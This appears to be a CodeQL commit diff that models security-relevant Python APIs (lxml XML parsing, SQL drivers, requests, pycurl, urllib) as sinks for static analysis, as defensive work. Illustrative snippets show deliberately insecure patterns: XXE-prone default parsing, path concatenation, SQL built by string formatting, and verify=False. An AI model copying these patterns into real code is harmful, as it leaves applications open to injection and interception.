// Note: for `parseid`/`XMLID` the result of the call is a `(root, dict)` tuple, so
// maybe we should not just say that the entire tuple is the decoding output... my
// gut feeling is that THIS instance doesn't matter too much, but that it would be
// nice to be able to do this in general. (This is a problem for both `lxml.etree`
// and `xml.etree`.)
result = this
}
}
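
A sketch of the call family covered by `LxmlParsing`; with no explicit parser the default, entity-resolving parser is used, and an explicit parser argument is tracked via `getParserArg()` (data is illustrative):

from lxml import etree

data = b"<doc/>"  # stand-in for untrusted input

root1 = etree.fromstring(data)                                    # no parser argument: XXE by default
root2 = etree.XML(data, etree.XMLParser(resolve_entities=False))  # explicit, hardened parser
root3, ids = etree.XMLID(data)                                    # returns the (root, id_dict) tuple noted above
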
/**
* A call to `lxml.etree.ElementTree.parse` or `lxml.etree.ElementTree.parseid`, which
* takes either a filename or a file-like object as argument. To capture the filename
* for path-injection, we have this subclass.
*
* See
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.parse
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.parseid
*/
private class FileAccessFromLxmlParsing extends LxmlParsing, FileSystemAccess::Range {
FileAccessFromLxmlParsing() {
functionName in ["parse", "parseid"]
// I considered whether we should try to reduce FPs from people passing file-like
// objects, which will not be a file system access (and couldn't cause a
// path-injection).
//
// I suppose that once we have proper flow-summary support for file-like objects,
// we can make the XXE/XML-bomb sinks allow an access-path, while the
// path-injection sink wouldn't, and then we will not end up with such FPs.
}
override DataFlow::Node getAPathArgument() { result = this.getAnInput() }
}
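
Why `parse`/`parseid` are also modeled as file system accesses, sketched with a hypothetical report-loading helper:

from lxml import etree

def load_report(report_name):
    # report_name may be attacker-controlled, so the concatenated path is a path-injection sink
    return etree.parse("/var/reports/" + report_name)
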
/**
* A call to `lxml.etree.iterparse`
*
* See
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.iterparse
*/
private class LxmlIterparseCall extends API::CallNode, XML::XmlParsing::Range,
FileSystemAccess::Range {
LxmlIterparseCall() {
this = API::moduleImport("lxml").getMember("etree").getMember("iterparse").getACall()
}
override DataFlow::Node getAnInput() { result in [this.getArg(0), this.getArgByName("source")] }
override predicate vulnerableTo(XML::XmlParsingVulnerabilityKind kind) {
// note that there is no `resolve_entities` argument, so it is not possible to turn off XXE
kind.isXxe()
or
kind.isXmlBomb() and
this.getKeywordParameter("huge_tree").getAValueReachingRhs().asExpr() = any(True t)
or
kind.isDtdRetrieval() and
this.getKeywordParameter("load_dtd").getAValueReachingRhs().asExpr() = any(True t) and
this.getKeywordParameter("no_network").getAValueReachingRhs().asExpr() = any(False t)
}
override predicate mayExecuteInput() { none() }
override DataFlow::Node getOutput() { result = this }
override DataFlow::Node getAPathArgument() { result = this.getAnInput() }
}
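
An `iterparse` sketch: since there is no `resolve_entities` switch the model always flags it for XXE, while `huge_tree`, `load_dtd` and `no_network` drive the other kinds (the file name is illustrative):

from lxml import etree

for event, element in etree.iterparse("upload.xml", huge_tree=True):
    print(event, element.tag)
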
}

View File

@@ -27,7 +27,10 @@ private module MySQLdb {
// ---------------------------------------------------------------------------
// MySQLdb
// ---------------------------------------------------------------------------
/** MySQLdb implements PEP 249, providing ways to execute SQL statements against a database. */
/**
* A model for MySQLdb as a module that implements PEP 249, providing ways to execute SQL statements
* against a database.
*/
class MySQLdb extends PEP249::PEP249ModuleApiNode {
MySQLdb() { this = API::moduleImport("MySQLdb") }
}
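
For context, the PEP 249 shape this modeling ultimately supports, `connect()` then `cursor()` then `execute(sql)`, sketched with made-up connection details; the same pattern applies to psycopg2 and PyMySQL below:

import MySQLdb

name = "alice"  # stand-in for untrusted input
conn = MySQLdb.connect(host="localhost", user="app", passwd="secret", db="shop")
cur = conn.cursor()
cur.execute("SELECT * FROM users WHERE name = '%s'" % name)  # SQL-injection sink when `name` is untrusted
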

View File

@@ -25,7 +25,7 @@ private module Mysql {
// mysql
// ---------------------------------------------------------------------------
/** Provides models for the `mysql` module. */
module mysql {
module MysqlMod {
/**
* The mysql.connector module
* See https://dev.mysql.com/doc/connector-python/en/connector-python-example-connecting.html

View File

@@ -22,7 +22,10 @@ private module Psycopg2 {
// ---------------------------------------------------------------------------
// Psycopg
// ---------------------------------------------------------------------------
/** psycopg2 implements PEP 249, providing ways to execute SQL statements against a database. */
/**
* A model of psycopg2 as a module that implements PEP 249, providing ways to execute SQL statements
* against a database.
*/
class Psycopg2 extends PEP249::PEP249ModuleApiNode {
Psycopg2() { this = API::moduleImport("psycopg2") }
}

View File

@@ -14,8 +14,11 @@ private import semmle.python.frameworks.PEP249
* Provides models for the `PyMySQL` PyPI package.
* See https://pypi.org/project/PyMySQL/
*/
private module PyMySQL {
/** PyMySQL implements PEP 249, providing ways to execute SQL statements against a database. */
private module PyMySql {
/**
* A model of PyMySQL as a module that implements PEP 249, providing ways to execute SQL statements
* against a database.
*/
class PyMySQLPEP249 extends PEP249::PEP249ModuleApiNode {
PyMySQLPEP249() { this = API::moduleImport("pymysql") }
}

View File

@@ -0,0 +1,59 @@
/**
* Provides classes modeling security-relevant aspects of the `pycurl` PyPI package.
*
* See
* - https://pypi.org/project/pycurl/
* - https://pycurl.io/docs/latest/
*/
private import python
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
/**
* Provides models for the `pycurl` PyPI package.
*
* See
* - https://pypi.org/project/pycurl/
* - https://pycurl.io/docs/latest/
*/
private module Pycurl {
/**
* Provides models for the `pycurl.Curl` class
*
* See https://pycurl.io/docs/latest/curl.html.
*/
module Curl {
/** Gets a reference to the `pycurl.Curl` class. */
private API::Node classRef() { result = API::moduleImport("pycurl").getMember("Curl") }
/** Gets a reference to an instance of `pycurl.Curl`. */
private API::Node instance() { result = classRef().getReturn() }
/**
* A call to `setopt` where the first argument is `pycurl.URL`; the second argument
* is then the URL of the outgoing request.
*
* See http://pycurl.io/docs/latest/curlobject.html#pycurl.Curl.setopt.
*/
private class OutgoingRequestCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
OutgoingRequestCall() {
this = instance().getMember("setopt").getACall() and
this.getArg(0).asCfgNode().(AttrNode).getName() = "URL"
}
override DataFlow::Node getAUrlPart() {
result in [this.getArg(1), this.getArgByName("value")]
}
override string getFramework() { result = "pycurl.Curl" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
}
}
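
A sketch of the `setopt(pycurl.URL, ...)` pattern captured above (the URL value is illustrative):

import pycurl

c = pycurl.Curl()
c.setopt(pycurl.URL, "http://example.com/")  # the URL argument tracked by getAUrlPart()
c.perform()
c.close()
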

View File

@@ -9,7 +9,6 @@
private import python
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
private import semmle.python.dataflow.new.DataFlow
private import semmle.python.dataflow.new.TaintTracking
private import semmle.python.frameworks.internal.InstanceTaintStepsHelper
private import semmle.python.frameworks.Stdlib
@@ -24,7 +23,7 @@ private import semmle.python.frameworks.Stdlib
* - https://docs.python-requests.org/en/latest/
*/
private module Requests {
private class OutgoingRequestCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
private class OutgoingRequestCall extends HTTP::Client::Request::Range, API::CallNode {
string methodName;
OutgoingRequestCall() {
@@ -54,14 +53,11 @@ private module Requests {
result = this.getArg(1)
}
/** Gets the `verify` argument to this outgoing requests call. */
DataFlow::Node getVerifyArg() { result = this.getArgByName("verify") }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
disablingNode = this.getVerifyArg() and
argumentOrigin = verifyArgBacktracker(disablingNode) and
disablingNode = this.getKeywordParameter("verify").getARhs() and
argumentOrigin = this.getKeywordParameter("verify").getAValueReachingRhs() and
argumentOrigin.asExpr().(ImmutableLiteral).booleanValue() = false and
not argumentOrigin.asExpr() instanceof None
}
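
What the rewritten `disablesCertificateValidation` check corresponds to in client code (a sketch; the URLs are illustrative):

import requests

requests.get("https://internal.example.com/", verify=False)  # a literal False disables certificate validation
requests.get("https://internal.example.com/", verify=None)   # None falls back to the session default, so it is not flagged
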
@@ -79,22 +75,6 @@ private module Requests {
}
}
/** Gets a back-reference to the verify argument `arg`. */
private DataFlow::TypeTrackingNode verifyArgBacktracker(
DataFlow::TypeBackTracker t, DataFlow::Node arg
) {
t.start() and
arg = any(OutgoingRequestCall c).getVerifyArg() and
result = arg.getALocalSource()
or
exists(DataFlow::TypeBackTracker t2 | result = verifyArgBacktracker(t2, arg).backtrack(t2, t))
}
/** Gets a back-reference to the verify argument `arg`. */
private DataFlow::LocalSourceNode verifyArgBacktracker(DataFlow::Node arg) {
result = verifyArgBacktracker(DataFlow::TypeBackTracker::end(), arg)
}
// ---------------------------------------------------------------------------
// Response
// ---------------------------------------------------------------------------

View File

@@ -115,7 +115,7 @@ private module RestFramework {
*/
class RestFrameworkApiViewClass extends PrivateDjango::DjangoViewClassFromSuperClass {
RestFrameworkApiViewClass() {
this.getABase() = any(ModeledApiViewClasses c).getASubclass*().getAUse().asExpr()
this.getParent() = any(ModeledApiViewClasses c).getASubclass*().getAnImmediateUse().asExpr()
}
override Function getARequestHandler() {
@@ -220,7 +220,7 @@ private module RestFramework {
*
* Use the predicate `Request::instance()` to get references to instances of `rest_framework.request.Request`.
*/
abstract class InstanceSource extends PrivateDjango::django::http::request::HttpRequest::InstanceSource {
abstract class InstanceSource extends PrivateDjango::DjangoImpl::Http::Request::HttpRequest::InstanceSource {
}
/** A direct instantiation of `rest_framework.request.Request`. */
@@ -295,19 +295,8 @@ private module RestFramework {
result = API::moduleImport("rest_framework").getMember("response").getMember("Response")
}
/**
* A source of instances of `rest_framework.response.Response`, extend this class to model new instances.
*
* This can include instantiations of the class, return values from function
* calls, or a special parameter that will be set when functions are called by an external
* library.
*
* Use the predicate `Response::instance()` to get references to instances of `rest_framework.response.Response`.
*/
abstract class InstanceSource extends DataFlow::LocalSourceNode { }
/** A direct instantiation of `rest_framework.response.Response`. */
private class ClassInstantiation extends PrivateDjango::django::http::response::HttpResponse::InstanceSource,
private class ClassInstantiation extends PrivateDjango::DjangoImpl::Http::Response::HttpResponse::InstanceSource,
DataFlow::CallCfgNode {
ClassInstantiation() { this = classRef().getACall() }
@@ -329,8 +318,8 @@ private module RestFramework {
*
* See https://www.django-rest-framework.org/api-guide/exceptions/#api-reference
*/
module APIException {
/** A direct instantiation of `rest_framework.exceptions.APIException` or subclass. */
module ApiException {
/** A direct instantiation of `rest_framework.exceptions.ApiException` or subclass. */
private class ClassInstantiation extends HTTP::Server::HttpResponse::Range,
DataFlow::CallCfgNode {
string className;
@@ -366,4 +355,7 @@ private module RestFramework {
override string getMimetypeDefault() { none() }
}
}
/** DEPRECATED: Alias for ApiException */
deprecated module APIException = ApiException;
}

View File

@@ -137,7 +137,7 @@ module SqlAlchemy {
*
* See https://docs.sqlalchemy.org/en/14/core/connections.html#dbapi-connections.
*/
module DBAPIConnection {
module DBApiConnection {
/**
* A source of instances of DB-API Connections, extend this class to model new instances.
*
@@ -149,8 +149,8 @@ module SqlAlchemy {
*/
abstract class InstanceSource extends DataFlow::LocalSourceNode { }
private class DBAPIConnectionSources extends InstanceSource, PEP249::Connection::InstanceSource {
DBAPIConnectionSources() {
private class DBApiConnectionSources extends InstanceSource, PEP249::Connection::InstanceSource {
DBApiConnectionSources() {
this.(DataFlow::MethodCallNode).calls(Engine::instance(), "raw_connection")
or
this.(DataFlow::AttrRead).accesses(Connection::instance(), "connection")
@@ -169,6 +169,9 @@ module SqlAlchemy {
DataFlow::Node instance() { instance(DataFlow::TypeTracker::end()).flowsTo(result) }
}
/** DEPRECATED: Alias for DBApiConnection */
deprecated module DBAPIConnection = DBApiConnection;
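
The two ways the modeled sources reach a raw DB-API connection from SQLAlchemy, sketched with an in-memory engine:

from sqlalchemy import create_engine

engine = create_engine("sqlite:///:memory:")
raw1 = engine.raw_connection()   # Engine.raw_connection()
with engine.connect() as conn:
    raw2 = conn.connection       # the Connection.connection attribute
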
/**
* Provides models for the `sqlalchemy.orm.Session` class
*

File diff suppressed because it is too large

View File

@@ -0,0 +1,71 @@
/**
* Provides classes modeling security-relevant aspects of the `urllib` module, part of
* the Python standard library.
*
* See
* - https://docs.python.org/2/library/urllib.html
* - https://docs.python.org/3/library/urllib.html
*/
private import python
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
/**
* Provides models for the `urllib` module, part of
* the Python standard library.
*
* See
* - https://docs.python.org/2/library/urllib.html
* - https://docs.python.org/3/library/urllib.html
*/
private module Urllib {
/**
* Provides models for the `urllib.request` extension library
*
* See https://docs.python.org/3.9/library/urllib.request.html
*/
module Request {
/**
* See
* - https://docs.python.org/3.9/library/urllib.request.html#urllib.request.Request
*/
private class RequestCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
RequestCall() {
this = API::moduleImport("urllib").getMember("request").getMember("Request").getACall()
}
override DataFlow::Node getAUrlPart() { result in [this.getArg(0), this.getArgByName("url")] }
override string getFramework() { result = "urllib.request.Request" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
/**
* See
* - https://docs.python.org/3.9/library/urllib.request.html#urllib.request.urlopen
*/
private class UrlOpenCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
UrlOpenCall() {
this = API::moduleImport("urllib").getMember("request").getMember("urlopen").getACall()
}
override DataFlow::Node getAUrlPart() { result in [this.getArg(0), this.getArgByName("url")] }
override string getFramework() { result = "urllib.request.urlopen" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
}
}
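
A sketch of the two `urllib.request` constructs modeled above; the target URL stands in for untrusted input:

import urllib.request

target = "http://example.com/"  # stand-in for user-controlled input (SSRF risk)
req = urllib.request.Request(target)
with urllib.request.urlopen(req) as resp:
    body = resp.read()
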

View File

@@ -0,0 +1,56 @@
/**
* Provides classes modeling security-relevant aspects of the `urllib2` module, part of
* the Python 2 standard library.
*
* See https://docs.python.org/2/library/urllib2.html
*/
private import python
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
/**
* Provides models for the `urllib2` module, part of
* the Python 2 standard library.
*
* See https://docs.python.org/2/library/urllib2.html
*/
private module Urllib2 {
/**
* See
* - https://docs.python.org/2/library/urllib2.html#urllib2.Request
*/
private class RequestCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
RequestCall() { this = API::moduleImport("urllib2").getMember("Request").getACall() }
override DataFlow::Node getAUrlPart() { result in [this.getArg(0), this.getArgByName("url")] }
override string getFramework() { result = "urllib2.Request" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
/**
* See
* - https://docs.python.org/2/library/urllib2.html#urllib2.urlopen
*/
private class UrlOpenCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
UrlOpenCall() { this = API::moduleImport("urllib2").getMember("urlopen").getACall() }
override DataFlow::Node getAUrlPart() { result in [this.getArg(0), this.getArgByName("url")] }
override string getFramework() { result = "urllib2.urlopen" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
}
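
The Python 2 counterpart for `urllib2`, sketched the same way with an illustrative URL:

import urllib2

req = urllib2.Request("http://example.com/")  # url argument tracked by getAUrlPart()
resp = urllib2.urlopen(req)
body = resp.read()
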

Some files were not shown because too many files have changed in this diff